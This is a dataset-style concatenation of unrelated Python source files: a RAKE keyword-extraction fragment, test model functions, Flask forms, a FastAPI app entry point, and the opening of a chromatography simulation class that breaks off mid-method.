self.phrase_scores[' '.join(phrase)] += score
def topn(self,n=7,phrase=True):
'''Get top phrases with ratings'''
if phrase:
scores = self.phrase_scores
else:
scores = self.token_weights
if n < 0:
n = len(scores)
return heapq.nlargest(n,
scores,
key=scores.get
)
def phrases(self,scores=True):
if scores:
result = sorted(
self.phrase_scores.items(),
key=lambda t:t[1],
reverse=True
)
else:
result = sorted(
self.phrase_scores,
key=self.phrase_scores.get,
reverse=True
)
return result
def get_token_weights(self,scores=True):
if scores:
result = sorted(
self.token_weights.items(),
key=lambda t:t[1],
reverse=True
)
else:
result = sorted(
self.token_weights,
key=self.token_weights.get,
reverse=True
)
return result
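# Minimal usage sketch (illustrative): the constructor expects already
# tokenized sentences (List[List[str]]) plus a stopword list; each phrase
# score is the sum of the word weights s(w) = deg(w)/freq(w) over its tokens.
if __name__ == '__main__':
    sample_text = [
        ['keyword', 'extraction', 'is', 'a', 'core', 'nlp', 'task'],
        ['rake', 'ranks', 'candidate', 'phrases', 'by', 'word', 'degree', 'and', 'frequency'],
    ]
    sample_stopwords = ['is', 'a', 'by', 'and']
    rake = Rake(sample_text, stopwords=sample_stopwords)
    pprint(rake.phrases())   # every candidate phrase with its score
    print(rake.topn(n=3))    # the three highest-scoring phrases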
| 2.65625 | 3 |
depimpact/tests/test_functions.py | NazBen/dep-impact | 0 | 10855 | <gh_stars>0
import numpy as np
import openturns as ot
def func_overflow(X, model=1, h_power=0.6):
"""Overflow model function.
Parameters
----------
X : np.ndarray, shape : N x 8
Input variables
- x1 : Flow,
- x2 : Krisler Coefficient,
- x3 : Zv, etc...
model : bool, optional(default=1)
If 1, the classical model. If 2, the economic model.
Returns
-------
Overflow S (if model=1) or Cost Cp (if model=2).
"""
X = np.asarray(X)
if X.shape[0] == X.size: # It's a vector
n = 1
dim = X.size
ids = None
else:
n, dim = X.shape
ids = range(n)
assert dim == 8, "Incorect dimension : dim = %d != 8" % dim
Q = X[ids, 0]
Ks = X[ids, 1]
Zv = X[ids, 2]
Zm = X[ids, 3]
Hd = X[ids, 4]
Cb = X[ids, 5]
L = X[ids, 6]
B = X[ids, 7]
H = (Q / (B * Ks * np.sqrt((Zm - Zv) / L)))**h_power
S = Zv + H - Hd - Cb
if model == 1:
return S
elif model == 2:
Cp = (S > 0.) + (0.2 + 0.8 * (1. - np.exp(-1000. / (S**4)))) * (S <= 0.) + 1./20. * (Hd * (Hd > 8.) + 8*(Hd <= 8.))
return Cp
else:
        raise AttributeError('Unknown model.')
tmp = ot.Gumbel()
tmp.setParameter(ot.GumbelMuSigma()([1013., 558.]))
dist_Q = ot.TruncatedDistribution(tmp, 500., 3000.)
dist_Ks = ot.TruncatedNormal(30., 8., 15., np.inf)
dist_Zv = ot.Triangular(49., 50., 51.)
dist_Zm = ot.Triangular(54., 55., 56.)
dist_Hd = ot.Uniform(7., 9.)
dist_Cb = ot.Triangular(55., 55.5, 56.)
dist_L = ot.Triangular(4990., 5000., 5010.)
dist_B = ot.Triangular(295., 300., 305.)
margins_overflow = [dist_Q, dist_Ks, dist_Zv, dist_Zm, dist_Hd, dist_Cb, dist_L, dist_B]
var_names_overflow = ["Q", "K_s", "Z_v", "Z_m", "H_d", "C_b", "L", "B"]
def func_sum(x, a=None):
"""Additive weighted model function.
Parameters
----------
x : np.ndarray
The input values.
a : np.ndarray
The input coefficients.
Returns
-------
y : a.x^t
"""
if isinstance(x, list):
x = np.asarray(x)
n, dim = x.shape
if a is None:
a = np.ones((dim, 1))
if a.ndim == 1:
a = a.reshape(-1, 1)
assert a.shape[0] == dim, "Shape not good"
elif a.ndim > 2:
raise AttributeError('Dimension problem for constant a')
y = np.dot(x, a)
if y.size == 1:
return y.item()
elif y.size == y.shape[0]:
return y.ravel()
else:
return y
def func_prod(x, a=None):
"""Product weighted model function.
Parameters
----------
x : np.ndarray
The input values.
a : np.ndarray
The input coefficients.
Returns
-------
y : a.x^t
"""
if isinstance(x, list):
x = np.asarray(x)
n, dim = x.shape
if a is None:
a = np.ones((dim, 1))
if a.ndim == 1:
a = a.reshape(-1, 1)
assert a.shape[0] == dim, "Shape not good"
elif a.ndim > 2:
raise AttributeError('Dimension problem for constant a')
y = np.sum(x, axis=1)
if y.size == 1:
return y.item()
elif y.size == y.shape[0]:
return y.ravel()
else:
return y
def func_spec(x, a=[0.58, -1, -1.0, 0, 0., 0.]):
"""Product weighted model function.
Parameters
----------
x : np.ndarray
The input values.
a : np.ndarray
The input coefficients.
Returns
-------
y : a.x^t
"""
if isinstance(x, list):
x = np.asarray(x)
n, dim = x.shape
y = a[0]*(x**2).prod(axis=1) + \
a[1]*x.prod(axis=1) + \
a[2]*(x**2).sum(axis=1) + \
a[3] * x.sum(axis=1) + \
a[4] * np.sin(x).sum(axis=1) + \
a[5] * np.cos(x).sum(axis=1)
if y.size == 1:
return y.item()
elif y.size == y.shape[0]:
return y.ravel()
else:
return y
def func_cum_sum_weight(x, weights=None, use_sum=True, const=[0., 0., 0., 1., 0., 0.]):
"""Additive weighted model function.
Parameters
----------
x : np.ndarray
The input values.
weights : np.ndarray
The input coefficients.
Returns
-------
y : a.x^t
"""
if isinstance(x, list):
x = np.asarray(x)
n, dim = x.shape
if weights is None:
weights = np.zeros((dim, dim))
corr_dim = dim * (dim-1)/2
k = 1
for i in range(1, dim):
for j in range(i):
weights[i, j] = k
k += 1
weights /= corr_dim
if weights.ndim == 1:
weights = weights.reshape(-1, 1)
assert weights.shape[0] == dim, "Shape not good"
elif weights.ndim > 2:
raise AttributeError('Dimension problem for constant a')
if use_sum:
y = 1
for i in range(1, dim):
for j in range(i):
y *= (1. + weights[i, j] * func_spec(np.c_[x[:, i], x[:, j]], a=const))
else:
y = 0
for i in range(1, dim):
for j in range(i):
y += weights[i, j] * func_spec(np.c_[x[:, i], x[:, j]], a=const)
return y
def multi_output_func_sum(x, output_dim=2):
"""Additive model function with multi output.
Parameters
----------
x : np.ndarray
The input values.
output_dim : int
The number of output dimension.
Returns
-------
y : [i * x]
"""
return np.asarray([x.sum(axis=1)*a for a in range(output_dim)]).T | 2.53125 | 3 |
app/main/forms.py | ingabire1/blog | 0 | 10856 | <filename>app/main/forms.py
from flask_wtf import FlaskForm
from wtforms import StringField,TextAreaField,SubmitField
from wtforms.validators import Required
class ReviewForm(FlaskForm):
title = StringField('Review title',validators=[Required()])
review = TextAreaField('Movie review', validators=[Required()])
submit = SubmitField('Submit')
class UpdateProfile(FlaskForm):
bio = TextAreaField('Tell us about you.',validators = [Required()])
submit = SubmitField('Submit')
# class LoginForm(FlaskForm):
# email = StringField('Your Email Address',validators=[Required(),Email()])
# password = PasswordField('Password',validators =[Required()])
# remember = BooleanField('Remember me')
# submit = SubmitField('Sign In')
class BlogForm(FlaskForm):
# my_category = StringField('Category', validators=[Required()])
title = StringField('Title', validators=[Required()])
blog_post = TextAreaField('Type Blog here', validators=[Required()])
post = SubmitField('Post Blog')
class CommentForm(FlaskForm):
name = StringField('Name',validators=[Required()])
# email = StringField('Email', validators=[Required()],render_kw={"placeholder": "Email"})
comment = TextAreaField('Enter Comment', validators=[Required()])
post = SubmitField('Post Comment')
class SubscriptionForm(FlaskForm):
name = StringField('First Name', validators=[Required()])
subscription_data = StringField('Email', validators=[Required()])
subscribe = SubmitField('Subscribe')
class UpdatePostForm(FlaskForm):
# title = StringField('Title', validators=[Required()])
blog_post = TextAreaField('Type Blog here', validators=[Required()])
submit=SubmitField('SUBMIT')
| 2.765625 | 3 |
SEPHIRA/FastAPI/main.py | dman926/Flask-API | 4 | 10857 | <filename>SEPHIRA/FastAPI/main.py
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from starlette import status
from starlette.middleware.base import BaseHTTPMiddleware, RequestResponseEndpoint
from starlette.requests import Request
from starlette.responses import Response
from starlette.types import ASGIApp
from config import APISettings, CORSSettings, FastAPISettings, PayPalSettings, UvicornSettings, ShopSettings, NowPaymentsSettings
import logging
####
# Custom Middlewares #
####
class LimitPostContentSizeMiddleware(BaseHTTPMiddleware):
def __init__(self, app: ASGIApp, max_upload_size: int) -> None:
super().__init__(app)
self.max_upload_size = max_upload_size
async def dispatch(self, request: Request, call_next: RequestResponseEndpoint) -> Response:
if request.method == 'POST':
if 'content-length' not in request.headers:
return Response(status_code=status.HTTP_411_LENGTH_REQUIRED)
			content_length = int(request.headers['content-length'])
if content_length > self.max_upload_size:
return Response(status_code=status.HTTP_413_REQUEST_ENTITY_TOO_LARGE)
return await call_next(request)
####
# #
####
logging.basicConfig(filename="log.log", level=logging.INFO, format=f'%(asctime)s %(levelname)s %(name)s %(threadName)s : %(message)s')
logger = logging.getLogger(__name__)
app = FastAPI(debug=FastAPISettings.DEBUG)
app.add_middleware(
CORSMiddleware,
allow_origins=CORSSettings.ALLOW_ORIGINS,
allow_methods=['*'],
allow_headers=['*']
)
if UvicornSettings.MAX_CONTENT_SIZE:
app.add_middleware(
LimitPostContentSizeMiddleware,
max_upload_size=UvicornSettings.MAX_CONTENT_SIZE
)
@app.on_event('startup')
async def startup():
logger.info('-- STARTING UP --')
print('-- STARTING UP --')
from database.db import initialize_db
initialize_db()
from resources.routes import initialize_routes
initialize_routes(app)
if ShopSettings.ENABLE:
if NowPaymentsSettings.ENABLE:
from resources.nowpayments import getNowPaymentsStatus, setCachedAvailableCoins
if await getNowPaymentsStatus():
print('NOWPayments is online. Fetching available coins...')
for i in range(NowPaymentsSettings.STARTUP_COIN_FETCH_AMOUNT):
if await setCachedAvailableCoins():
print('NOWPayments coins cached.')
break
else:
print('Failed to get NOWPayments coins.')
if i < NowPaymentsSettings.STARTUP_COIN_FETCH_AMOUNT - 1:
print(f'Retrying {NowPaymentsSettings.STARTUP_COIN_FETCH_AMOUNT - 1 - i} time(s).')
else:
print('NOWPayments not responding.')
print(f'Available coins will be set on the next request to {APISettings.ROUTE_BASE}payment/nowpayments/available-coins if NOWPayments is available.')
print('-- STARTED UP --')
logger.info('-- STARTED UP --')
@app.on_event('shutdown')
async def shutdown():
logger.info('-- SHUTTING DOWN --')
print('-- SHUTTING DOWN --')
from database.db import close_db
close_db()
import os
import shutil
if os.path.exists('cache'):
shutil.rmtree('cache')
print('-- SHUT DOWN --')
logger.info('-- SHUT DOWN --')
if __name__ == '__main__':
import uvicorn
uvicorn.run('main:app', reload=UvicornSettings.USE_RELOADER, log_level=UvicornSettings.LOG_LEVEL, port=UvicornSettings.PORT) | 2.03125 | 2 |
bio_rtd/uo/sc_uo.py | open-biotech/bio-rtd | 5 | 10858 | """Semi continuous unit operations.
Unit operations that accept constant or box-shaped flow rate profile
and provide periodic flow rate profile.
"""
__all__ = ['AlternatingChromatography', 'ACC', 'PCC', 'PCCWithWashDesorption']
__version__ = '0.7.1'
__author__ = '<NAME>'
import typing as _typing
import numpy as _np
import scipy.interpolate as _interp
from bio_rtd.chromatography import bt_load as _bt_load
import bio_rtd.utils as _utils
import bio_rtd.core as _core
import bio_rtd.pdf as _pdf
class AlternatingChromatography(_core.UnitOperation):
"""Simulation of alternating chromatography.
This class implements logic common to various types of alternating
chromatography. It has a role of a base class for
specific types of alternating chromatography to extend.
Parameters
----------
t
Simulation time vector.
Starts with 0 and has a constant time step.
uo_id
Unique identifier.
load_bt
Load breakthrough logic.
peak_shape_pdf
Elution peak shape.
gui_title
Readable title for GUI. Default = "AC".
Notes
-----
**Quick description of which attributes are available:**
Non-binding species (optional):
* :attr:`non_binding_species`
Column volume (exactly one required):
* :attr:`cv`
* :attr:`ft_mean_retentate` and :attr:`column_porosity_retentate`
Column porosity for binding species (required in case of
:attr:`ft_mean_retentate` or wash or load recycling):
* :attr:`column_porosity_retentate`
Equilibration step duration (optional, if both, the values are
added together):
* :attr:`equilibration_cv`
* :attr:`equilibration_t`
Equilibration step flow rate (exactly one needed):
* :attr:`equilibration_f` - absolute, has priority if defined
* :attr:`equilibration_f_rel` - relative, default = 1
Load step duration:
* :attr:`load_cv` - preferred
* :attr:`load_c_end_ss` - concentration limit for breakthrough; also
requires :attr:`load_recycle_pdf`
* :attr:`load_c_end_relative_ss` - concentration limit for
breakthrough relative to steady-state load concentration; also
requires :attr:`load_recycle_pdf`
Iterative optimization of estimation of load step duration
(ignored if :attr:`load_cv` is defined):
* :attr:`load_c_end_estimate_with_iterative_solver` - default = True
* :attr:`load_c_end_estimate_with_iter_solver_max_iter` - default =
1000
Extension of first load step (optional; ignored if no recycling):
* :attr:`load_extend_first_cycle` - default = `False`
* :attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t` - added together if both defined
Load linear velocity - only for column height determination
(optional):
* :attr:`load_target_lin_velocity`
Wash step duration (optional, if both, the values are
added together):
* :attr:`wash_cv`
* :attr:`wash_t`
Wash step flow rate (exactly one needed):
* :attr:`wash_f` - absolute, has priority if defined
* :attr:`wash_f_rel` - relative, default = 1
Unaccounted losses - applied before peak cut (optional):
* :attr:`unaccounted_losses_rel` - relative, default = 0
Elution step duration (optional, if both, the values are
added together):
* :attr:`elution_cv`
* :attr:`elution_t`
Elution step flow rate (exactly one needed):
* :attr:`elution_f` - absolute, has priority if defined
* :attr:`elution_f_rel` - relative, default = 1
Elution buffer composition (optional):
* :attr:`elution_buffer_c`
Elution peak position duration - first momentum
(optional, if both, the values are added together):
* :attr:`elution_peak_position_cv`
* :attr:`elution_peak_position_t`
Elution peak cut start (one is required):
* :attr:`elution_peak_cut_start_t`
* :attr:`elution_peak_cut_start_cv`
* :attr:`elution_peak_cut_start_c_rel_to_peak_max`
* :attr:`elution_peak_cut_start_peak_area_share`
Elution peak cut end (one is required):
* :attr:`elution_peak_cut_end_t`
* :attr:`elution_peak_cut_end_cv`
* :attr:`elution_peak_cut_end_c_rel_to_peak_max`
* :attr:`elution_peak_cut_end_peak_area_share`
Regeneration step duration (optional, if both, the values are
added together):
* :attr:`regeneration_cv`
* :attr:`regeneration_t`
Regeneration step flow rate (exactly one needed):
* :attr:`regeneration_f` - absolute, has priority if defined
* :attr:`regeneration_f_rel` - relative, default = 1
Wash desorption (optional, also check if class supports it):
* :attr:`wash_desorption` - default = `False`
Load breakthrough recycle (optional):
* :attr:`load_recycle` - default = `False`
Load breakthrough propagation dynamics
(required if :attr:`load_recycle` is `True`
or :attr:`load_c_end_ss` is defined or
or :attr:`load_c_end_relative_ss` is defined):
* :attr:`load_recycle_pdf`
Wash recycle (optional):
* :attr:`wash_recycle` - default = `False`
Duration of wash recycling
(optional; ignored if :attr:`wash_recycle` is `False`):
* :attr:`wash_recycle_duration_cv` and
:attr:`wash_recycle_duration_t` - summed together if both defined.
* Entire wash step if
:attr:`wash_recycle_duration_cv` and
:attr:`wash_recycle_duration_t` are not defined.
Please note that subclasses might introduce new attributes or change
the default values of existing attributes.
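Examples
--------
Minimal configuration sketch (illustrative values; in practice one of
the subclasses, e.g. :class:`ACC` below, is used and configured in the
same way):
>>> dt = 0.5 # min
>>> t = _np.arange(0, 24.1 * 60, dt)
>>> load_bt = _bt_load.ConstantPatternSolution(dt, dbc_100=50, k=0.12)
>>> peak_shape_pdf = _pdf.ExpModGaussianFixedRelativeWidth(t, 0.15, 0.3)
>>> ac = AlternatingChromatography(t, "ac_example",
... load_bt=load_bt,
... peak_shape_pdf=peak_shape_pdf)
>>> ac.cv = 100 # mL
>>> ac.load_cv = 20
>>> ac.wash_cv = 5
>>> ac.elution_cv = 3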
"""
def __init__(self,
t: _np.ndarray,
uo_id: str,
load_bt: _core.ChromatographyLoadBreakthrough,
peak_shape_pdf: _core.PDF,
gui_title: str = "AC"):
super().__init__(t, uo_id, gui_title)
# Bind parameters.
self.load_bt: _core.ChromatographyLoadBreakthrough = load_bt
"""Determines what part of load material binds to the column."""
self.elution_peak_shape: _core.PDF = peak_shape_pdf
"""Elution peak shape."""
self.non_binding_species: _typing.Sequence[int] = []
"""Process buffer species that are NOT binding to the column.
Indexing starts with 0.
"""
self.cv: float = -1
"""Column volume.
Column volume should be defined by exactly one of the following
attribute groups:
* :attr:`cv` (this one)
* :attr:`ft_mean_retentate`
and :attr:`column_porosity_retentate`
"""
self.ft_mean_retentate: float = -1
"""Flow-through time of retentate under non-binding conditions.
Used to define column volume (independently of scale).
Column volume should be defined by exactly one of the following
attribute groups:
* :attr:`cv`
* :attr:`ft_mean_retentate` (this one) and
:attr:`column_porosity_retentate`
"""
self.column_porosity_retentate: float = -1
"""Column porosity for retentate under non-binding conditions.
Required in case :attr:`ft_mean_retentate` is used to define
column volume.
Required in case :attr:`load_c_end_ss` or
:attr:`load_c_end_relative_ss` are used to estimate
load step duration.
Required in case of load or wash recycling.
"""
self.equilibration_cv: float = -1
"""Duration of equilibration step.
The values of :attr:`equilibration_t` and
:attr:`equilibration_cv` are added together.
"""
self.equilibration_t: float = -1
"""Duration of equilibration step.
The values of :attr:`equilibration_t` and
:attr:`equilibration_cv` are added together.
"""
self.equilibration_f: float = -1
"""Equilibration step flow rate.
Equilibration step flow rate should be defined by
exactly one of the following attributes:
* :attr:`equilibration_f` (this one)
* :attr:`equilibration_f_rel`
"""
self.equilibration_f_rel: float = 1
"""Equilibration step flow rate relative to load flow rate.
Default = 1.
Equilibration step flow rate = :attr:`equilibration_f_rel`
* `load flow rate`
Equilibration step flow rate should be defined by
exactly one of the following attributes:
* :attr:`equilibration_f`
* :attr:`equilibration_f_rel` (this one)
"""
# Duration of the load phase.
self.load_cv: float = -1 # load duration in CV
"""Load phase duration in CV.
This is the preferable way to define the duration of the load step
as it does not require any estimations about steady state.
Load phase duration should be defined by exactly one of
the following attribute groups:
* :attr:`load_cv` (this one)
* :attr:`load_c_end_ss`
* :attr:`load_c_end_relative_ss`
Notes
-----
First load step can be extended by setting
:attr:`load_extend_first_cycle`,
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`.
"""
self.load_c_end_ss: _typing.Optional[_np.ndarray] = None
"""Load phase switch based on target product breakthrough conc.
Load phase duration is estimated from simulating steady state
operation and determining when the breakthrough reaches
specified concentration.
Steady state simulation requires
:attr:`column_porosity_retentate` and
:attr:`load_recycle_pdf`.
Load phase duration should be defined by exactly one of
the following attribute groups:
* :attr:`load_cv` (preferred)
* :attr:`load_c_end_ss` (this one)
* :attr:`load_c_end_relative_ss`
Notes
-----
First load step can be extended by setting
:attr:`load_extend_first_cycle`,
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`.
"""
self.load_c_end_relative_ss: float = -1
"""Load phase switch based on relative breakthrough conc.
Load phase duration is estimated from simulating steady state
operation and determining when the product (binding species)
in the breakthrough reaches specified relative concentration
(relative to load concentration in steady-state operation).
Steady state simulation requires
:attr:`column_porosity_retentate` and
:attr:`load_recycle_pdf`.
Load phase duration should be defined by exactly one of
the following attribute groups:
* :attr:`load_cv` (preferred)
* :attr:`load_c_end_ss`
* :attr:`load_c_end_relative_ss` (this one)
Notes
-----
First load step can be extended by setting
:attr:`load_extend_first_cycle`,
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`.
"""
self.load_c_end_estimate_with_iterative_solver: bool = True
"""Finer optimization of cycle length estimation.
Default = `True`.
In case load step duration is estimated based of breakthrough
criteria (i.e. by :attr:`load_c_end_ss` or
:attr:`load_c_end_relative_ss`), the model needs to simulate
steady-state operation in order to determine fixed load time.
This parameter enables an iterative solver that allows more
precise estimation but might slow down the simulation.
Notes
-----
Max number of iteration steps is defined by
:attr:`load_c_end_estimate_with_iter_solver_max_iter`.
"""
self.load_c_end_estimate_with_iter_solver_max_iter: int = 1000
"""Max steps for optimization of cycle length estimation.
Default = 1000.
See Also
--------
:attr:`load_c_end_estimate_with_iterative_solver`
"""
self.load_extend_first_cycle: bool = False
"""Extend first load phase to achieve a faster steady-state.
Only relevant in case wash or load is recycled.
The duration of extension is defined by:
* :attr:`load_extend_first_cycle_cv` or
* :attr:`load_extend_first_cycle_t` or
* is determined automatically.
"""
self.load_extend_first_cycle_cv: float = -1
"""Duration of first load phase extension in column volumes.
Only relevant if :attr:`load_extend_first_cycle` is `True`.
If the duration is defined by
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`
then the values are added together.
"""
self.load_extend_first_cycle_t: float = -1
"""Duration of first load phase extension (time).
Only relevant if :attr:`load_extend_first_cycle` is `True`.
If the duration is defined by
:attr:`load_extend_first_cycle_cv` and
:attr:`load_extend_first_cycle_t`
then the values are added together.
"""
self.load_target_lin_velocity: float = -1
"""Target load linear velocity.
It is used to provide information about required column height.
It does not have any impact on the rest of the model.
Units need to match other units in the model.
"""
self.wash_cv: float = -1
"""Duration of wash step.
The values of :attr:`wash_t` and
:attr:`wash_cv` are added together.
"""
self.wash_t: float = -1
"""Duration of wash step.
The values of :attr:`wash_t` and
:attr:`wash_cv` are added together.
"""
self.wash_f: float = -1
"""Wash step flow rate.
Wash step flow rate should be defined by
exactly one of the following attributes:
* :attr:`wash_f` (this one)
* :attr:`wash_f_rel`
"""
self.wash_f_rel: float = 1
"""Wash step flow rate relative to load flow rate. Default = 1.
Wash step flow rate = :attr:`wash_f_rel`
* `load flow rate`
Wash step flow rate should be defined by
exactly one of the following attributes:
* :attr:`wash_f`
* :attr:`wash_f_rel` (this one)
"""
self.unaccounted_losses_rel: float = 0
"""Unaccounted losses as a share of bound material.
Elution peak is scaled down by 1 - `unaccounted_losses_rel`
before applying peak cut criteria.
"""
self.elution_cv: float = -1
"""Duration of elution step.
The values of :attr:`elution_t` and
:attr:`elution_cv` are added together.
"""
self.elution_t: float = -1
"""Duration of elution step.
The values of :attr:`elution_t` and
:attr:`elution_cv` are added together.
"""
self.elution_f: float = -1
"""Elution step flow rate.
Elution step flow rate should be defined by
exactly one of the following attributes:
* :attr:`elution_f` (this one)
* :attr:`elution_f_rel`
"""
self.elution_f_rel: float = 1
"""Elution step flow rate relative to load flow rate.
Default = 1.
Elution step flow rate = :attr:`elution_f_rel`
* `load flow rate`
Elution step flow rate should be defined by
exactly one of the following attributes:
* :attr:`elution_f`
* :attr:`elution_f_rel` (this one)
"""
self.elution_buffer_c: _np.ndarray = _np.array([])
"""Elution buffer composition.
Default = empty array (= all components are 0).
If defined, it must have a value for each species.
"""
self.elution_peak_position_cv: float = -1
"""Position (cv) of elution peak in the elution step.
This is for 1st moment or mean residence time (and not
necessarily peak max position).
The values of :attr:`elution_peak_position_t` and
:attr:`elution_peak_position_cv` are added together.
"""
self.elution_peak_position_t: float = -1
"""Position (time) of elution peak in the elution step.
This is for 1st moment or mean residence time (and not
necessarily peak max position).
The values of :attr:`elution_peak_position_t` and
:attr:`elution_peak_position_cv` are added together.
"""
self.elution_peak_cut_start_t: float = -1
"""Elution peak cut start (time).
Exactly one peak cut start criteria should be defined.
"""
self.elution_peak_cut_start_cv: float = -1
"""Elution peak cut start (cv).
Exactly one peak cut start criteria should be defined.
"""
self.elution_peak_cut_start_c_rel_to_peak_max: float = -1
"""Elution peak cut start (signal relative to peak max).
Exactly one peak cut start criteria should be defined.
"""
self.elution_peak_cut_start_peak_area_share: float = -1
"""Elution peak cut start (share of total peak area).
Exactly one peak cut start criteria should be defined.
"""
self.elution_peak_cut_end_t: float = -1
"""Elution peak cut end (time).
Exactly one peak cut end criteria should be defined.
"""
self.elution_peak_cut_end_cv: float = -1
"""Elution peak cut end (cv).
Exactly one peak cut end criteria should be defined.
"""
self.elution_peak_cut_end_c_rel_to_peak_max: float = -1
"""Elution peak cut end (signal relative to peak max).
Exactly one peak cut end criteria should be defined.
"""
self.elution_peak_cut_end_peak_area_share: float = -1
"""Elution peak cut end (share of total peak area).
Exactly one peak cut end criteria should be defined.
"""
self.regeneration_cv: float = -1
"""Duration of regeneration step.
The values of :attr:`regeneration_t` and
:attr:`regeneration_cv` are added together.
"""
self.regeneration_t: float = -1
"""Duration of regeneration step.
The values of :attr:`regeneration_t` and
:attr:`regeneration_cv` are added together.
"""
self.regeneration_f: float = -1
"""Regeneration step flow rate.
Regeneration step flow rate should be defined by
exactly one of the following attributes:
* :attr:`regeneration_f` (this one)
* :attr:`regeneration_f_rel`
"""
self.regeneration_f_rel: float = 1
"""Regeneration step flow rate relative to load flow rate.
Default = 1.
Regeneration step flow rate = :attr:`regeneration_f_rel`
* `load flow rate`
Regeneration step flow rate should be defined by
exactly one of the following attributes:
* :attr:`regeneration_f`
* :attr:`regeneration_f_rel` (this one)
"""
self.wash_desorption: bool = False
"""Enable wash desorption.
Make sure the class implements the desorption dynamics.
"""
self.load_recycle: bool = False
"""Recycle load breakthrough. Default = False."""
self.load_recycle_pdf: _typing.Optional[_core.PDF] = None
"""PDF of wash and/or unbound load traveling through the column.
The unbound (not captured) part and desorbed part are propagated
through the column by :attr:`load_recycle_pdf`.
Void volume for :attr:`load_recycle_pdf` is defined as
:attr:`column_porosity_retentate` * `column volume`.
"""
self.wash_recycle: bool = False
"""Recycle wash. Default = False.
Wash is recycled onto 3rd column while the 2nd is on load step.
After the wash recycle, the 3rd column is connected to 2nd
column to recycle load breakthrough material.
"""
self.wash_recycle_duration_cv: float = -1
"""Duration of wash recycle (cv).
Relevant if :attr:`wash_recycle` is `True`.
If both (`wash_recycle_duration_cv` and
:attr:`wash_recycle_duration_t`) are defined, then the values
are added together. If none of those is defined, then the
entire wash step is recycled.
"""
self.wash_recycle_duration_t: float = -1
"""Duration of wash recycle (time).
Relevant if :attr:`wash_recycle` is `True`.
If both (`wash_recycle_duration_t` and
:attr:`wash_recycle_duration_cv`) are defined, then the values
are added together. If none of those is defined, then the
entire wash step is recycled.
"""
@_core.UnitOperation.log.setter
def log(self, logger: _core._logger.RtdLogger):
"""Propagates logger across other elements that support it."""
# Default logic.
self._logger = logger
self._logger.set_data_tree(self._log_entity_id, self._log_tree)
# Propagate logger across other elements with logging.
if self.load_recycle_pdf is not None:
self.load_recycle_pdf.set_logger_from_parent(self.uo_id, logger)
if self.elution_peak_shape is not None:
self.elution_peak_shape.set_logger_from_parent(self.uo_id, logger)
if self.load_bt is not None:
self.load_bt.set_logger_from_parent(self.uo_id, logger)
def _get_flow_value(self,
step_name: str, var_name: str,
flow: float, rel_flow: float) -> float:
"""Calc flow rate of chromatographic step.
If `flow` is specified, `flow` is used.
Otherwise `rel_flow` == flow rate relative to load flow rate is
used.
If none are positive, then the load flow rate is used
and a warning is logged.
Parameters
----------
step_name
Step name (e.g. "Wash") for log messages.
var_name
Step variable name (e.g. "wash_t") for log data.
flow
Flow rate.
rel_flow
Flow rate relative to load flow rate.
Returns
-------
float
Flow rate.
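Notes
-----
Illustrative numbers (assumptions): with `rel_flow` = 1.2 and a load
flow rate of 10 (volume/time), the step flow rate resolves to
1.2 * 10 = 12.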
"""
if flow > 0:
self.log.i_data(self._log_tree, var_name, flow)
elif rel_flow > 0:
flow = rel_flow * self._load_f
self.log.i_data(self._log_tree, var_name, flow)
else:
self.log.w(f"{step_name} step flow rate is not defined,"
f" using load flow rate instead.")
flow = self._load_f
return flow
def _get_time_value(self,
step_name: str, var_name: str,
t: float, cv: float, flow: float) -> float:
"""Calc duration of chromatographic step.
If the step duration is specified in cv and in t, then the
values are added together.
Parameters
----------
step_name
Step name (e.g. "Wash") for log messages.
var_name
Step variable name (e.g. "wash_t") for log data.
t
Duration (time).
cv
Duration (cv).
flow
Flow rate (required if `cv` > 0).
Returns
-------
float
Total step duration (time).
"""
# Calc.
t_sum = max(t, 0)
if cv > 0:
assert flow > 0, f"{step_name}: Flow rate must be defined (> 0)" \
f" if the duration is specified in CVs."
assert self._cv > 0, f"CV must be determined (by `calc_cv`)" \
f" before calculating duration based on CVs."
t_sum += cv * self._cv / flow # sum
# Log.
if t <= 0 and cv <= 0:
self.log.w(step_name + " time is not defined")
else:
self.log.i_data(self._log_tree, var_name, t_sum)
return t_sum
def _assert_non_binding_species(self):
"""Make sure binding species list is valid."""
if len(self.non_binding_species) > 0:
assert max(self.non_binding_species) < self._n_species, \
"Index of non_binding_species too large (indexes start with 0)"
assert list(set(self.non_binding_species)) \
== list(self.non_binding_species), \
"List of non_binding_species should have ascending order"
assert len(self.non_binding_species) < self._n_species, \
"All species cannot be non-binding."
# Log.
self.log.i_data(self._log_tree,
'non_binding_species',
self.non_binding_species)
def _calc_load_f(self):
"""Determine load flow rate (when on)."""
assert self._is_flow_box_shaped(), "Inlet flow must be box shaped."
self._load_f = self._f.max()
self.log.d_data(self._log_tree, 'load_f', self._load_f)
def _calc_cv(self):
"""Determine column volume."""
self._ensure_single_non_negative_parameter(
log_level_multiple=self.log.ERROR, log_level_none=self.log.ERROR,
cv=self.cv,
ft_mean_retentate=self.ft_mean_retentate,
)
if self.cv > 0:
self._cv = self.cv
else: # `self.ft_mean_retentate` > 0.
assert self.column_porosity_retentate > 0, \
f"porosity_retentate must be defined to calc CV from " \
f" `self.ft_mean_retentate`."
assert self._load_f > 0, f"Load flow rate must be defined to" \
f" calc CV from `self.ft_mean_retentate`."
self._cv = self.ft_mean_retentate * self._load_f \
/ self.column_porosity_retentate
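# Illustrative numbers (assumptions): ft_mean_retentate = 6.4 min with
# load_f = 10 mL/min and porosity 0.64 give cv = 6.4 * 10 / 0.64 = 100 mL.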
# Log.
self.log.i_data(self._log_tree, 'cv', self._cv)
def _report_column_dimensions(self):
"""Report column dimensions based on load linear velocity."""
if self.load_target_lin_velocity > 0:
self._col_h = self._cv * self.load_target_lin_velocity \
/ self._load_f
self.log.i_data(self._log_tree, "column_h", self._col_h)
self.log.i_data(self._log_tree,
"column_d",
(self._cv / self._col_h / _np.pi) ** 0.5 * 2)
def _calc_equilibration_t(self):
"""Determine equilibration step duration."""
if self.equilibration_cv > 0:
# Flow rate.
eq_f = self._get_flow_value("Equilibration",
"equilibration_f",
self.equilibration_f,
self.equilibration_f_rel)
# Duration.
self._equilibration_t = self._get_time_value("Equilibration",
"equilibration_t",
self.equilibration_t,
